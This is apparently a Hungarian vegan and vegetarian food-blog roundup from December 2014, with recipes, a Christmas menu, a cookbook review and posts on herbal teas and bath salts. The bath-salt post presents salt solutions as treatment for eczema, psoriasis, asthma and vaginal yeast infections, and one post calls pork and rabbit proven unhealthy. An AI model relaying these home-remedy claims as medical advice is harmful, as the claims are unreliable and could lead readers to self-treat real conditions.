Egy új év mindig hoz magával újévi fogadalmakat, hogy na, most egészségesebben fogunk táplálkozni. Sokan már tisztító kúrákat ajánlanak, de szerintem januárban nehéz elkezdeni egy ilyet, amikor még van maradék szilveszterről, de az is lehet, hogy még karácsonyról is. Februárig biztosan elfogynak a finomságok, szóval én jobbnak látom a tisztítás megkezdését februárban. Viszont az egészségesebb táplálkozás fogadalmát megkezdhetjük az év első hónapjában is, hiszen főzni mindannyian főzünk – ki többet, ki kevesebbet -, így érdemes odafigyelni, hogy mi kerül az asztalunkra. Ez a curry hűtőtakarításból jött létre, végtelenül egyszerű és szezon, valamint hűtőtartalom szerint variálhatók benne a zöldségek. Én két nagyon egyszerűt főztem bele: répát és burgonyát, meg volt a fagyasztómban zöldbab, így azt is beledobtam. El tudom képzelni édesburgonyával, sütőtökkel, spenóttal, nyáron cukkinivel, padlizsánnal. Gyors, egyszerű, de mégis különleges.
Villámgyors vegán téli zöldséges curry
Hozzávalók 3-4 főre:
– 6-8 db közepes burgonya, meghámozva, felkockázva
– 4 db közepes répa, meghámozva, felkockázva
– 300 g fagyasztott zöldbab (feldarabolható, én egészben hagytam)
– 250 ml kókusztej
– 1 db hámozott paradicsom konzerv
– 2 teáskanál kurkuma
– 1 teáskanál őrölt kömény
– 1 teáskanál cayenne bors (ha kevésbé akarjuk csípősre, akkor kevesebb)
– só, bors
– 1 evőkanál kókuszzsír vagy napraforgó olaj
– főtt barnarizs a tálaláshoz
Egy lábasban adjuk a kókuszzsírhoz a fűszereket és közepes láng felett főzzük egy-két percig, amíg illatos lesz a fűszerkeverék. Ekkor adjuk hozzá a felkockázott burgonyát, répát, öntsük fel a kókusztejjel, a hámozott paradicsomokkal és a levével. Ha szükséges adjunk hozzá egy kevés vizet, hogy éppen ellepje (de ne túl sokat, hogy a krémes sűrűségét megőrizze a ragu). Főzzük kb. 25-30 percig lassú tűzön, ekkor adjuk hozzá a zöldbabot és főzzük tovább, amíg minden zöldség megpuhul. Ízlés szerint sózzuk, borsozzuk.
Tálaljuk főtt barnarizzsel.
Tápszer helyett ezzel etetik a babákat
A napi ötszöri zöldség- és gyümölcsfogyasztást népszerűsítő programban - amely a világ számos országában fut - egy fél avokádó tesz ki egy adagot. A nyers avokádóból semleges íze révén édes és sós ételek egyaránt készíthetők, így például saláta, krém mártogatáshoz, leves, tejes turmix, jégkrém, kevés cukorral és lime-mal elkeverve édesség, de illik húsokhoz, halakhoz, lehet szendvics vagy szusi alapja, s grillezhető is. Főzni viszont nem szabad, mert keserű lesz. A karibi vidékeken gyakori, hogy tej vagy tápszer hiányában avokádóval etetik a csecsemőket.
Újévi fogadalom: gyógytea minden napra
Új év, új fogadalmak. Ez egy kiváló alkalom lehet arra, hogy egy picit tegyünk az egészségünkért. Egy csésze gyógyteával, minden reggel. Én és a párom minden reggelt 1 csésze gyógyteával kezdünk már legalább 3 éve. A gyógynövények és a belőlük készült teák az egészségmegőrzésben, megelőzésben és a gyógyításban is fontos szerepet játszanak. Tehát gyógyteát nemcsak akkor lehet inni, amikor betegek vagyunk, hanem megelőzésre is kiválóan alkalmazhatók. Ebben a blogban minden hónap végén megadom a következő hónap gyógyteáit, hogy legyen idő beszerezni azt. Hogyan készítsük el a teánkat? A teát lehet hideg áztatással, forrázással vagy főzéssel elkészíteni, attól függően, hogy a növény mely részét használjuk fel, és milyen hatóanyagot akarunk kivonni. Tehát egy gyógynövényt pl. áztathatunk vagy forrázhatunk is, ezáltal más hatóanyag fog érvényesülni, a szervezetre gyakorolt hatása is más lesz. Az első legfontosabb meghatározás a mennyiség. Általában 2,5 dl vízhez kell 1 csapott evőnanál drogot (levelet, gyökeret, termést, virágot) tenni. Ha ettől eltérő arány kell, akkor azt jelezni fogom. Hideg áztatás legalább 6-12 órán keresztül történik. Forrázat során (15-20 perc) fontos, hogy fedjük le a csészét, hogy az értékes illóolajok ne tudjanak elpárologni. Főzés során (3-4 perc) szintén érdemes lefedni, és az elpárolgott vizet pótolni kell. Lehetőség szerint ne használjunk fém- és műanyag eszközöket, kerámia, porcelán vagy üveg csészét válasszunk . Ne édesítsük a teát, mert csökkenti, illetve módosítja azok hatását. Pl. a keserű teáknak keserűnek kell lennie, hogy a májra és az epére hassanak. A teát ne igyuk forrón , hagyjuk szobahőmérsékletűre hűlni. A tea elfogyasztására szenteljünk egy kis időt. Üljünk le egy kényelmes fotelba, ízlelgessük, kortyolgassuk, és gondoljunk arra, hogy milyen jó hatással lesz a szervezetünkre. A teákat többnyire étkezés előtt kell meginni, a nyugtató teákat lefekvés előtt fél órával. JANUÁR Itt a tél, a legfontosabb az immunerősítés . január 1-15. felváltva kakukkfű, csipkebogyó és gyömbér tea. január 16. borsmenta tea január 16-30. felváltva bodza, orbáncfű és cickafark (férfiaknak kisvirágú füzike)
Narancsos sütőtökös lencse saláta
2014. december 30. Zöld Avocado
Folytassuk még egy gyors és egyszerű lencsés recepttel, ami szintén szerepelhet a Szilveszteri menüben. Télies ízek, a gluténra érzékenyek számára is! narancsos sütőtökös lencse saláta De miért is fogyasszunk rendszeresen lencsét? Milyen értékes tápanyagforrásunk lehet ez a nem éppen fogyókúrás, hüvelyes növény? "Kevés ilyen tápláló és jól emészthető zöldségünk van, mint a lencse. 100 grammból 340-350 kcal, 1430-1480 kJ energiát tud adni fogyasztójának, ami nem kevés. Szokatlanul magas a fehérjetartalma is, 25-28% körüli. A benne lévő aminosavak összetétele, továbbá az emészthetőség szempontjából fogyasztása kedvezőbb, mint a babé vagy borsóé. Tartalmazza lényegében valamennyi fontos aminosavunkat, köztük az ember számára nélkülözhetetlen esszenciális aminosavakat is, amelyeket szervezetünk nem tud önállóan előállítani. Az állati fehérjeforrásokhoz képest elenyésző a vele együtt fölvett koleszterin és egyéb zsírok mennyisége, melyek mindössze 1-2 %-át adják az elfogyasztott lencsének. Nem véletlen, ha a főként növényi koszton élő ázsiai népek körében nagy megbecsülésnek örvend. A tartósan vegetáriánus életmódot élőknek mindenképpen figyelmébe ajánljuk. Igen jelentős szénhidráttartalma is, 100 grammból 53-60 grammot tesznek ki ezek az anyagok, de mivel úgynevezett glikémiás indexe alacsony, ideális, lassan felszívódó szénhidrátforrás lehet a cukorbetegek számára is. A lencse nagy A-vitamin-tartalma miatt kedvez a szemnek, jelentős továbbá 0,8 mg körüli B1-vitamin (tiamin) tartalma. Egy csészényi lencse fólsav-igényünk 90 százalékát fedezi, ezért például várandósoknak kifejezetten ajánlott, ha a szelekre nem érzékenyek. Az ásványi anyagok közül a kálium, vas (7,5 mg) és az anyagcsere-szabályozásban igen fontosnak tartott cink van jelen." Forrás: www.hazipatika.com NARANCSOS SÜTŐTÖKÖS LENCSE SALÁTA narancsos sütőtökös lencse saláta HOZZÁVALÓK: - 2 bögre vörös lencse - 2 nagyobb narancs - 1 érett avokádó - 1 ek repce/olíva olaj - 1 kisebb sütőtök - Himalája só, frissen őrölt fekete bors - 1 dl víz - friss, és nyers zöld saláta - 1 marék egész dió - (opcionálisan friss petrezselyem) - (opcionálisan - sörélesztőpehely) ELKÉSZÍTÉS: A sütőtökről levágom a héját, és kimagozom, majd kicsi, kb.1*1 cm-es kockákra darabolom, és egy sütőpapíron, előmelegített sütőbe teszem. Kb.220°C fokon 30 perc alatt puhára sül. Én szeretem, ha egy kicsit elkezd barnulni a cukor a külsején, ami a hő hatására kicsapódott belőle, mert attól még édesebb lesz. J Miután elkészült, félre teszem hűlni. Közben elkészítjük a lencsét... A lencsét -amit fajtájától függően- pár órával előtte beáztattam, hogy hamarabb megpuhuljon főzés közben. Felteszem egy lábosban főni, sós vízben, fedővel. Attól függően, hogy milyen típusú a lencse, kb. 20-30 perc alatt puhára főhet. Miután elkészült leöntöm róla a levet, leszűröm és félre teszem hűlni. sütőtökös lencse (sült zellerrel) Hűl a sütőtök, és a lencse is. Jöhet a narancsos ízbomba a salátához, a ,,szósz! :-) Az érett avokádót megszabadítom a héjától és a magtól. Ezt a legegyszerűbben úgy lehet, hogy kettévágjuk, és kanállal kikanalazzuk a húst a héjból. Ezt beletesszük a turmix gépbe, majd hozzáadjuk 2 db egész narancs húsát (lehetőleg magmentesen), 1 ek tetszés szerintit olajat, kb. 1 dl vizet, egy csipet Himalája sót, és egy tekerésnyit a frissen őrölt fekete borsból. A turmix gép segítségével egynemű krémmé pépesítjük a hozzávalókat. Egy olyan saláta öntetszerű állagot szeretnénk kapni, így ha szükséges még vízzel hígíthatjuk. A kihűlt tököt és lencsét összekeverjük egy nagy tálban a narancsos krémmel. Friss zöld salátára tálaljuk, és megszórjuk egész dióval. Ha valaki könnyed vacsorára vágyik, már fogyaszthatja is ezt a narancsos salátát! :-) Ha azonban kicsit táplálóbbat szeretnénk, fogyaszthatunk mellé natúr/enyhén sós, 100% kukorica tortillát, vagy puffasztott kukorica/búza tallért, vagy egy szelet teljes kiőrlésű piritóst, vagy akár készíthetünk mellé natúr kuszkuszt is. narancsos sütőtökös lencse saláta Egy egyszerű saláta, és mégis valami új íz! Jó étvágyat ehhez az elsőre furcsának tűnő, ám annál finomabb ételhez! ;-) Megjegyzés: készítettem már el ezt a salátát úgy is, hogy a sütőtök mellé zeller (gumó) kockákat is tettem a sütőbe, és azt is hozzákevertem a lencséhez. Észre sem lehetett venni, és közben pedig elfogyott az egyébként nem éppen kedvelt, pedig roppant egészséges zeller gumó is. ;-) Megjegyzés2: Minden valószínűség szerint több mint 11000 éve ismerjük, és 8000 éve termesztjük is a lencsét. Erre utalnak a III. Ramszesz fáraó sírjában talált jelenetek is, amelyekről úgy vélik, a lencse termesztését és elkészítését ábrázolják. Nem véletlen az sem, hogy a Bibliában a Teremtés könyvének 25. részében is megemlítik. Ézsau egy tál lencséért adta el Jákobnak elsőszülöttségi jogát. Ázsiában ma is alapvető élelmiszernek számít, csak Indiában 50 féle lencsét ismernek.
Quinoa puding hibiszkusszal
Ez egy elég újszerű megközelítése a karácsonyi desszerteknek. Ízében, színében, állagában a karácsonyt varázsolja az ünnepi asztalra. Ennél a desszertnél a hibiszkusz tea ihletett gyümölcsdarabokkal. Egy tea főzésével indul a desszert elkészítése is. Az enyhén savanykás-édes ízek kavalkádja. Talán furcsán hangzik, de ennek a desszertnek nem elhanyagolható a Cvitamin tartalma sem. A quinoa pedig az egyik legegészségesebb, gluténmentes gabona.
Élettani hatásai:
Az inkákon kívül sokan sokáig nem tudták, mennyire értékes is ez a növény - a spanyol hódítók például majdnem kiirtották a quinoát, amikor megtiltották az indiánoknak a termesztését. A “csodagabonát” aztán az 1980-as években fedezte fel ismét két amerikai, akik meg is kezdték a termesztését Colorádóban. Az amerikai Sziklás-hegységben ma évente több mint 100 000 kiló quinoát termelnek. A legértékesebb fajta 4000 méter felett nő: ez a legédesebb és a legfehérebb. A fehér típuson kívül létezik még piros és fekete a növényből: előbbi kissé intenzívebb ízzel rendelkezik, mint a fehér változat, a fekete pedig még erőteljesebb aromával bír.
Nem hizlal, gluténmentes és lúgosít
A quinoa az egyik legjobb növényi fehérjeforrás, ráadásul kiemelkedően magas is a fehérje-tartalma – jóval több, mint a rizsé vagy a búzáé. Található benne C-, E- és B-vitamin – utóbbiból többféle -, továbbá az öregedésért is felelős szabadgyököket hatástalanító béta-karotin, az ásványi anyagok közül pedig magnézium, vas, foszfor, cink, kálcium, valamint minden olyan aminosavat tartalmaz, melyre a szervezetnek szüksége van. Mivel nem tartalmaz glutént, könnyű megemészteni, ráadásul lisztérzékenyek is bátran fogyaszthatják.
Hozzávalók: 4 fő részére
2 evőkanálnyi hibiszkusz – gyümölcstea keverék, szárított gyümölcsdarabokkal
3 dl víz
6-7 evőkanálnyi quinoa
3 evőkanálnyi kókusztejszín
késhegyni őrölt vanília
3 evőkanálnyi agave szirup, vagy méz, vagy nyírfacukor
1 evőkanálnyi őrölt útifűmaghéj őrlemény
A vizet felforraljuk és ráöntjük a hibiszkuszos gyümölcsdarabokra, majd hagyjuk állni 7-10 percig. Leszűrjük, félreteszünk belőle kb. 1 dl -t és az alaposan megmosott quinoat odatessszük főni a leszürt gyümölcsteában. Ha szükséges még adunk hozzá kevés vizet. Amikor mág megfőtt, a kis gömböcskék kidagadtak, hozzákeverjük a kókusztejszínt és az édesítőt, majd a vaníliát. Poharakba adagoljuk. A félretett gyümölcsteát ízlés szerint édesítjük és belekeverjük az útifűmaghéjőrleményt. Elkeverjük és a kiadagolt quinoa puding tetejére kanalazzuk. Egy zselés állagot fogunk kapni. A gyümölcsdarabokkal díszitjük. Hűtőben hűtjük 30-60 percig.
Vegán szuper reggeli smoothie
2014. december 27. Zizi kalandjai
Beigli? Pipa. Zserbó? Pipa. Kalács? Pipa. Sajtos rúd? Pipa. Töltött káposzta? Pipa. Hókifli? Pipa. Gondolom mindenki ezeket pipálgatta az elmúlt napokban. Tele a pocak, jó kis munkát adtunk az emésztőrendszerünknek, de itt az idő, hogy hagyjuk egy picit őt is pihenni. Ha csak az új évben indítjuk a fogadalmakat (pl: egészségesebben táplálkozunk), annyit megtehetünk még az idén, hogy iszunk egy ilyen laktató turmixot egy olyan reggelen, amikor már nincs több beigli, így nem is tudjuk, hogy akkor mit reggelizzünk, igaz? Hát akkor elő a turmixgéppel, dobáljuk bele ezt a néhány hozzávalót és már kész is a tökéletes reggeli smoothie. Jó sűrű, laktat, de még is könnyedebb az emésztése, mint annak a sok sütinek, amit az elmúlt napokban fogyasztottunk.
Az alapanyagokat lehet variálni, attól függően, hogy kinek mi van otthon. Az alap legyen a banán, én ehhez adtam spenótot (de kipróbáltuk már leveleskellel is, az is jó volt – javaslom, hogy valamilyen semleges ízű zöldet tegyünk bele), zabpelyhet (de rozspehellyel is kiváló), mandulatejet (bármilyen növényi tejjel helyettesíthető), chia magot (jó a lenmag is), fagyasztott bogyós gyümölcsöt és kendermagport (ez helyettesíthető bármilyen szuper élelmiszerrel, legyen az spirulina, szőlőmagliszt, fekete ribiszke liszt, maca por vagy acai por - tudom ezek drága dolgok, de csak keveset kell használni belőlük és sokáig elállnak, egyszer-egyszer érdemes befektetnünk).
Vegán szuper reggeli smoothie
Hozzávalók 2 főre:
- 1 vagy 2 banán (attól függően, hogy mennyire szeretnénk édesre, én mindig egyet használok)
- 2 kisebb marék friss spenót
- 2 kisebb marék vegyek bogyós gyümölcs (málna, szeder, áfonya, ribizli)
- 2-3 evőkanál zabepehely
- 1 evőkanál chia mag
- 1 evőkanál kendermagpor
- 200-300 ml mandulatej (attól függően, hogy mennyire szeretnénk sűrűre)
Tegyük az összes hozzávalót a robotgépbe és turmixoljuk simára. Töltsük poharakba és azonnal fogyasszuk, mivel a chia- vagy lenmag elég hamar besűríti és utána inkább kanalazva tudjuk enni.
Ugyanitt használt vágódeszka ingyen elvihető...
A Férj gasztobloggernek képzelte magát, a szobát meg elterítették a disznóságok. Jelentem Ő vásárolt, nyiszatolt, maszatolt, mártogatott , fotózott, mosogatott!, és pakolt el, még a deszkát is alaposan elsúrolta, de nem maradhat... Borzasztó lelkesedéssel indult neki a projektnek, és várta a hatást, meg a véleményeket. Említettem neki, hogy megjegyzések olyanok itt, mint a fehér holló, erre nagyon csalódott lett, de a látogatási statisztika alakulásával elégedett. Igen, a hülyeség mindig kelendő, valószínűleg az előző bejegyzés és a szalonnacukra rekordokat fog dönteni. Bezzeg a hajdinás sütim! Azt ugye nem nézi csak néhány elvetemült hasonszőrű, meg gluténérzékeny. De legalább libasonka lett volna... Azt, hogy vegetáriánus az ember, könnyebben megértik az emberek, mintha szelektíven bizonyos húsokat nem eszik meg, és még csak nem is zsidó származású. Viszont hasonló okokból nem fogyasztunk pl. disznó, nyúl, egyéb húsokat. Amik mára kiderültek, hogy valóban nagyon egészségtelenek. Így a jelige az, hogy be se kerüljön a házba! Másrészt büdös is, nem csak ártalmas a fogyasztása, és idegesít. A mélyen tisztelt főszakács úr sem táplálkozik ilyenekkel, bár húsevő, csak most megengedte magának ezt a gyagyaságot. :) Egyébként aranyos volt, ahogy nagy lendülettel tett-vett. Mint a kis majdnemkétévesünk, mikor a vonatait tologatja szenvedélyesen, és közben magyaráz. Azért visszásak az érzelmek bennem, az első hozzávalónál felberzenkedtek az idegeim. Másrészt viszont oly sok fotós projektjében részt vettem, és olykor nagyon élveztem az egész menetét, és büszke voltam az eredményre, ezért valahol ezt is megértem. Ez az oka, hogy teret kapott, és vendégposztként szerepelhet. A többi véleményemet meg majd egyszer leírom, amikor már megint rá se néz a blogra. :)
Nyugtató fürdősó nemcsak karácsonyra
2014. december 22. Éltető ételek
Stresszesek a mindennapjaid? Jó lenne egy kis lazítás esténként? Nos, akkor készíts fürdősót magadnak, vagy párodnak, ismerősödnek. Amellett, hogy a gyógynövények és az illóolajok miatt jótékony hatása van, még a só áldásos hatásai is érvényesülnek. Amennyiben nincs semmilyen egészségügyi problémád, akkor 1%-os sókoncentrátum javasolt a sófürdőhöz. Hozzávalók (1 dl mennyiség lesz belőle): - 10 dkg durvaszemű tengeri fürdősó - 10 csepp levendula illóolaj - 5 csepp római kamilla illóolaj - 30 csepp ligetszépe olaj - 1 teáskanál szódabikarbóna - szárított körömvirág és levendula Elkészítése: A sóra cseppentsük rá az olajakat, majd keverjük jól össze, és még adjuk hozzá a szódabikarbónát is. - Rétegezve tegyük díszes, zárható üvegbe. A sónak számos jótékony hatása van: - gyulladásban lévő bőrprobléma kezelése - ekcéma, pikkelysömör, köröm- illetve lábgomba, szemölcs - nőgyógyászati probléma, pl. hüvelygomba - allergia, szénanátha, asztma Felhasználási javaslat ekcéma esetén: A sófürdő során alkalmazott sókoncentráció a bőr állapotának függvénye. Nyílt sebeknél kezdjük 1%-os koncentrációjú sófürdővel. Azaz egy 100 literes fürdőkádba tegyünk kb. 1 kg kristálysót. Ha begyógyult a bőr, felemelhetjük a sókoncentrációt 5%-ig. A sófürdő nem csak a viszketést enyhíti, hanem megszünteti a bőr szárazságát is, valamint nyugtatólag hat a vegetatív idegrendszerre is. Akut megbetegedésnél vegyünk heti 2 sófürdőt. Ha a panaszok elmúltak elegendő havi 1-2 sófürdő. Felhasználási javaslat pikkelysömör esetén: Pikkelysömör esetén 3-8%-os sókoncentráció nyugodtan alkalmazható. Utána ne töröljük meg a bőrt, hanem hagyjuk levegőn megszáradni. Az erősen megtámadott testrészeket, mint a fejbőr, hajtő, lábszár, könyök, térd kenjük be a tömény 26 %- os sóoldattal, vagy készítsünk rá pakolást. Felhasználási javaslat bőrgyulladások, pattanás, herpesz esetén: Készítsünk tömény, 26%-os sóoldatot, mellyel kenjük be az érintett felületet. Ez a 26%-os sóoldat nem más, mint egy telített oldat, amely során már több só nem tud feloldódni egy adott mennyiségű vízben. Itt bővebb információt olvashatsz a telített sóoldatról (sole). Hüvelygomba esetén: Kezdetben, szükség esetén naponta 2-3x irrigáljon 1,5 - 3 %- os sóoldattal. Gyulladáscsökkentésre illetve viszketés ellen kenjük be a szeméremajkakat tömény sóoldattal. Allergia, szénanátha Kezdetben naponta többször is - igény szerint - öblítsük ki a szemünket és az orrunkat 1 %-os sóoldattal. Ezzel lemossuk az allergéneket a nyálkahártyáról, amelynek következtében megszűnik a duzzanat. Erős köhögési rohamoknál helyezzünk a nyelvre egy csipetnyi kristálysót. Hamarosan megszűnik a köhögési inger.
Karácsonyi citromkrémes gofri (vegán)
2014. december 20. Mindennapi ételeink
Nagyon finom, próbáljátok ki, hiszen gyors, mutatós és olcsó édesség. Ne feledjétek, hogy karácsonykor is érdemes a fehér cukor helyett barnát használni, vagy egyéb alternatív édesítőszereket, most gyümölcscukrot tettem ebbe a süteménybe, nagyon finom volt. Hozzávalók: 1 pohár finomliszt 1/2 pohár durumliszt 1/2 pohár teljes őrlésű liszt 1 kk. foszfátmentes sütőpor 2 ek. gyümölcscukor 3 ek. rizs italpor víz -amennyit felvesz A krémhez: 2 csomag vaníliás pudingpor 2 nagy citrom leve és héja gyümölcscukor, vanília - ízlés szerint 1 l növényi tej 4-5 ek. kókusz habkrém Elkészítés: A gofri tészta alapanyagjait összekeverjük és 3 órán át állni hagyjuk. Majd a hagyományos módon kisütjük - előtte növényi margarinnal kenjük ki a gofrisütőt. A pudingot szintén a hagyományos módon készítjük: 5 ek. kivételével felforraljuk a növényi tejet, eközben ezzel a kimaradt tejjel kikeverjük a pudingot, hozzáadjuk a gyümölcscukrot, citromlevet és héjat, beleöntjük a forrásban lévő tejbe és forrás után még pár percig főzzük. Amikor kihűlt, belekeverjük a habkrémet. Megrakjuk a kisült gofrikat és tortaként tálaljuk ezt az egészséges finomságot.
Szejtánburger worchesteres gombával
2014. december 19. Vegán muflon
Él a vegánokról egy olyan sztereotípia, hogy a hajnali fél négyes ébredés után a hepciás vadszamár jógapózban időznek két órán át, majd desztillált pi-vízben megfürdenek, és reggeli gyanánt eleszik a papagáj elől az etetőbe bekészített biokölest. Súlyos nagy tévedés, kérem! Ezen sorok írója pl.csak azért, hogy megcáfolja mindezt, minden nap másnaposan avászkodik ki az ágyból délután háromkor, fellapátol egy IFA-platónyi kokaint, "reggelire" pedig azbesztporral elkevert energiaitalt fogyaszt, amit előzőleg mikrohullámú sütőben melegít szobahőmérsékletűre. A bevezetőben említett mítosz további lerombolása érdekében következzék egy klasszikus junkfood. Annyira azonban a fekete öves biofasisztáknak sem kell elborzadnia: ha három éven át ezt fogyasztanák ebédre, akkor sem kellene attól tartaniuk, hogy idővel egy cintányérozó szódagyári portás fejlődik ki bélbolyhaikból.
További mítosz, hogy a hamburger klasszikus egykaptafás táplálék. Ezt azonban csak azok terjesztik, akik életüket egy lakókocsihoz láncolva élték le a balatonakarattyai strandon. A titok mindössze annyi, hogy örökre feledkezzünk el a szikkadt barna zsemléről, a húspogácsáról, valamint a saláta-paradicsom-csalamádé "szent"háromságról. Pl. hasonló formában:
Előkészítendő:
1 csomag jó minőségű hamburgerzsemle 120g (kb. fél csomag) szejtánpor 3 evőkanál szójaszósz 2 kiskanál liszt vegamix vagy hasonló ételízesítő 1 evőkanál margarin, margarinfóbiásoknak 1 evőkanál kókuszzsír 2 fej vöröshagyma 300 g csiperkegomba felszeletelve 1 dl vörösbor ízlés szerint worchesterszósz só A szejtánporhoz hozzáadjuk a lisztet, és lelkiismeretesen elkeverjük benne. A szójaszószhoz egy pohárban hozzáadunk 1dl vizet, majd a szejtánhoz lötyböljük. Kézzel jól összegyúrjuk, megdolgozzuk, mint kidobó az angol legénybúcsúst. Végezetül henger formájúja gyúrjuk, felvágjuk három egyforma részre, és szójaszószos-vegamixes vízben addig főzzük, míg fel nem jön a víz tetejére. Ekkor kivesszük, és heveny káromkodások közepette megkíséreljük 1-1,5 centis szeletekre vágni. Az obszcén szavakat elkerülendő, akár meg is várjatjuk, míg kihűl, a művelethez ugyanis puszta kezünkkel is hozzá kell érnünk. Ekkor egy grillserpenyőbe olajat öntünk, sózzuk, ételízesítővel fűszerezzük, és jól átsütjük. (A szejtán szolid traktorbelső-állaga némileg megmarad, ez anyagából adódó sajátossága. Ám ízre így is kifogástalan lesz.) Közben két másik edényben margarint vagy kókuszzsírt hevítünk. Egyikhez hozzáadjuk a felkarikázott hagymát, a másikhoz a gombát. Egy darabig sztereóban pároljuk. A hagymához hozzáfröcskölünk 1dl vörösbort, és megvárjuk, míg teljesen el nem fő. Ezek után mély szakértelemmel megsózzuk. Közben áttérünk a gombára: miután elfőtte a levét, irgalmat nem ismerve meglocsoljuk worchester szósszal, megsózzuk, majd boldogan belelapátoljuk a szejtánburgerbe némi savanyúuborka, jalapeno paprika és sátáni kechup és mustár társaságában. Ímhol a végeredmény:
Vegetáriánus, vegán menü karácsonyra
2014. december 19. Zizi kalandjai
Ha még nem állítottátok össze a karácsonyi menüt, akkor remélem ez a kis összefoglaló nagy segítségetekre lesz, akár az idén, akár jövőre. Nálunk többféle étel készül a három nap alatt, és az biztos, hogy az egyik napon egy vegetáriánus vagy vegán egyben sült “fasírt” kerül az asztalra, ez a fő fogás és mellé készítünk jó sok köretet. Egy ilyennel le tudjátok nyűgözni a húsevőket is (ez saját tapasztalat). A receptek egy része a saját blogomról, egy része pedig más blogokról lett összeválogatva, hogy minél színesebb körképet adjak a vegetáriánus, vegán karácsonyról!
Egyben sültek
Legnagyobb sikere a diósültnek szokott lenni. Ha nagyobb családot látunk vendégül, érdemes belőle dupla adagot készíteni. Ez az a fajta étel, amiről nem hiszik el a húsevők sem, hogy nincsen benne hús! Kihagyhatatlan!
A mázas diós lencsesült szintén egy tápláló, kiadós fogás, finom édeskéz mázzal megsütve a tetején.
A Jamie Oliver féle vörösáfonyás pisztácia mandula sült sok-sok alapanyagot tartalmaz, de ettől lesz fantasztikusan finom és karakteres íze. Néhány dolgot el tudunk előre készíteni, így az időigényes munkát le tudjuk karácsony napjára rövidíteni.
Ez a vörösáfonyás, narancsos lencsés quinoa egyben sült is jól néz ki. Ki fogom próbálni!
Nem egyben sült, viszont főfogás lehet a csípős pirított tofu steak. Aki idegenkedik a tofutól annak is ajánlom, mivel az erős fűszerezés teljesen megváltoztatja a tofu natúr ízét.
Köretek
Kelbimbó
Igen, tudom… a kelbimbót sokan nem szeretik, de szerintem érdemes adni neki egy esélyt. Nagyon sok finomság készülhet belőle, legyen az valamilyen köret, vagy akár saláta. Nekem az egyik kedvencem ez a narancsos változat.
Süthetjük vörösáfonyával és dióval is együtt, vagy burgonyával, rozmaringgal és fokhagymával.
Kevert, meleg salátát is készíthetünk belőle vagy egy ilyen gyönyörű, színes mindent bele salátával is lenyűgözhetjük a vendégeinket – arról nem is beszélve, hogy milyen vitaminokkal teli fogást tálalunk nekik.
Burgonyapüré
Paszternákos burgonyapüré kakukkfűvel – a paszternák jól kiegészíti a burgonyát ebben a pürében. A paszternák egyébként helyettesíthető zellerrel.
A sütőtökös burgonyapürét rozmaringgal dobtam fel – itt is el tudok képzelni helyettesítést: a sütőtököt lecserélhetjük édesburgonyára.
Nagy kedvenc a karamellizált hagymás püré, amelyhez barnamártás is készült. Karfiollal felturbózott változat? Jöhet!
Töltelék
Húsos fogásokat sokszor töltelékkel készítenek el, ebből kiindulva egy vegetáriánus karácsonyi asztalra is kerülhet töltelék köretként tálalva… még színesebbé és gazdagabbá tesszük az ünnepi asztalunkat. Kezdésnek itt van ez a kapribogyós, almás változat. Furcsának hangozhat a kettő együtt, de én imádom.
Ez a leveleskeles gombás változat elég izgalmas. Lencsével és zellerrel is feldobhatjuk a tölteléket.
Levesek
Egy egyszerű krémleves beindíthatja az ízlelőbimbóinkat és ráadásul az elkészítése sem igényel túl sok időt. Ez a brokkoli krémleves fél óra alatt megvan. A karfiolos zöld tea krémleves extrémnek tűnhet, pedig nem az!
A gesztenyekrémleves kimondott karácsonyi étel, extrázhatjuk, ha zsályás birsalmával tálaljuk.
Sült répa és édesburgonya krémleves a csodás narancsos színével kápráztatja el a vendégeket. Csicsóka póréhagymával párosítva elég menő. Ha igazán le akarjuk kenyerezni a vendégeket, akkor főzzünk kókuszos cékla consommé-t.
Desszertek
A hagyományos desszertek mellett (zserbó, beigli, kalács, mákos guba) érdemes bevállalni egy-két különlegesebb sütit, édességet. Például ez a sütőtökös pite eltér a hagyományos sütiktől.
Ez a vegán duplacsokis, kókuszos pite mennyei lehet… az elsők között van a kipróbálandó receptek listámon. Szintén kiszemelt áldozat ez a sütés nélküli diós, sütőtökös vegán pite.
A céklás csokoládé torta mindenki kedvence lehet, csak ne áruljuk el előre, hogy cékla van benne! Ez is hasonló csak erre krém is került. A narancs jó párost alakít a csokoládéval. És persze a világ legfinomabb csokoládétortája ez a nyers változat.
*****
Ha van kedvenc receptetek, ami mindig nagy sikert arat karácsonykor, írjátok meg kommentben, hogy a többiek is csemegézhessenek belőle! Jó készülődést kívánok mindenkinek!
Bereznay Tamás: Süteményeskönyv
2014. december 17. Zizi kalandjai
Tamást évek óta ismerem és fantasztikus, ahogyan dolgozik: főz, oktat a Metro Gasztroakadémián (amelynek egyben a tanácsadója és szakmai vezetője is), szakácskönyveket ír. Elmondása szerint kölyök kora óta imád főzni. Mindig fontosnak tartotta, hogy tudását megossza másokkal, így képzésein az izgalmas újdonságok mellett a napi munkához elengedhetetlenül fontos praktikus tanácsokra is számíthatnak a résztvevők. A Gasztroakadémián volt szerencsém ezt személyesen is megtapasztalni, sőt miattam készítettünk vegetáriánus fogásokat is a tanfolyamon.
A Boook Kiadó gondozásában jelent meg a Süteményeskönyv második bővített kiadása, amely 73 receptet tartalmaz, mindegyikhez különálló kép tartozik. Gyönyörűek az ételfotók (Körmendi Imre), a styling (Kapolka Ágnes) és az életképek (Sárosi Zoltán) is. Nem tudom, hogy hol készültek az életképek - egy káli medencés rusztikus házat tudok elképzelni gyönyörű konyhával -, de igazi otthoni, laza sütögetős hangulatot árasztanak. A képek láttán az az érzésünk támad, - attól függően, hogy rutinos vagy kezdő konyhatündérek vagyunk-e -, hogy irány a konyha, gyúrjunk tésztát, készítsünk sütit és csurgassunk olvasztott csokoládét a tetejére.
A könyv 10 fejezetből áll: gyümölcs, vanília, magvak, citrusok, lekvár, túró, mák, méz, csokoládé és gesztenye. Vannak benne könnyen elkészíthető, egyszerű édességek, klasszikusok, Tamás saját családi receptjei, valamint vannak olyanok is, amelyek komolyabb tudást vagy esetleg több időt igényelnek. A receptek jól szerkesztettek, könnyű követni őket és érthetőek. Nekem nagyon tetszik a szilvás lepény, a körte carpaccio és a jól ismert bögrés mákos süti.
A könyvbemutató pár hete volt a Metro Gasztroakadémián, ahol a jelenlévők Tamás segítségével készíthették el a túrógombócot, amelyhez néhány titkot is elárult: nem kell a túrógombóchoz sót, vagy cukrot adni; vagy, hogy a gombócok megformázásánál praktikus fagylaltos kanalat használni ezenkívül különlegessé tehetjük a gombócot úgy, hogy a zsemlemorzsába darált diót keverünk.
